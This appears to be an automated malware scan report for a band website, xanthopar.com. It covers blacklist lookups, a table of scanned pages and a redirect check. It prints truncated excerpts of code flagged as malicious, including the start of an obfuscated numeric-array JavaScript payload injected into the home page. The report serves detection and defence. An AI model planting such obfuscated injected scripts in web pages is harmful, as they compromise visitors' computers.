Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xanthopar.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xanthopar.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xanthopar.com/ | 200 OK Content-Length: 30090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
(function($$){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,5
Antivirus reports:
http://xanthopar.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 28841 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, domLoadFnArr = [], regObjArr = [], timer = null, storedAltContent = null, storedAltContentId
Antivirus reports:
http://xanthopar.com/news.html | 200 OK Content-Length: 4557 Content-Type: text/html | clean |
http://xanthopar.com/Tour.html | 200 OK Content-Length: 3393 Content-Type: text/html | clean |
http://xanthopar.com/band.html | 200 OK Content-Length: 4744 Content-Type: text/html | clean |
http://xanthopar.com/media.html | 200 OK Content-Length: 4085 Content-Type: text/html | clean |
http://xanthopar.com/extras.html | 200 OK Content-Length: 5224 Content-Type: text/html | clean |
http://xanthopar.com/Cons.html | 200 OK Content-Length: 3121 Content-Type: text/html | clean |
http://xanthopar.com/index.html | 200 OK Content-Length: 30090 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
(function($$){qq2=[8,0,26,0,11,81,29,0,26,86,65,82,0,54,48,29,84,72,73,83,27,60,59,54,48,0,0,38,85,76,76,57,69,65,82,0,5,45,79,78,84,72,0,5,36,65,84,69,0,5,40,79,85,82,83,0,5,45,73,78,85,84,69,83,0,5,51,69,67,79,78,68,83,8,9,61,93,27,0,11,75,29,0,26,0,6,82,12,54,80,29,84,72,73,83,14,3,81,8,9,12,73,29,16,27,54,80,59,17,61,11,29,17,27,87,72,73,76,69,8,73,11,11,28,23,9,91,3,82,29,54,80,59,73,61,0,15,3,82,28,3,45,9,54,80,59,73,61,0,22,3,82,93,60,0,54,80,14,83,80,76,73,67,69,8,94,90,7,9,12,17,11,94,5
Antivirus reports:
http://xanthopar.com/test404page.js | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthopar1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthopar1280X1024.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthoparwings1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../mEDIA/xanthoparleather1920X1080.jpg | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
http://xanthopar.com/../extras/XANTHOPAR_Tattoo.pdf | 404 Not Found Content-Length: 1063 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xanthopar.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 04:08:31 GMT
Accept-Ranges: bytes
ETag: "aa9798c-758a-4b9797214f4c0"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 30090
Content-Type: text/html
Last-Modified: Tue, 21 Feb 2012 13:32:43 GMT
...30090 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xanthopar.com
Referer: http://www.google.com/search?q=xanthopar.com
Result:
The result is similar to the first query. There are no suspicious redirects found.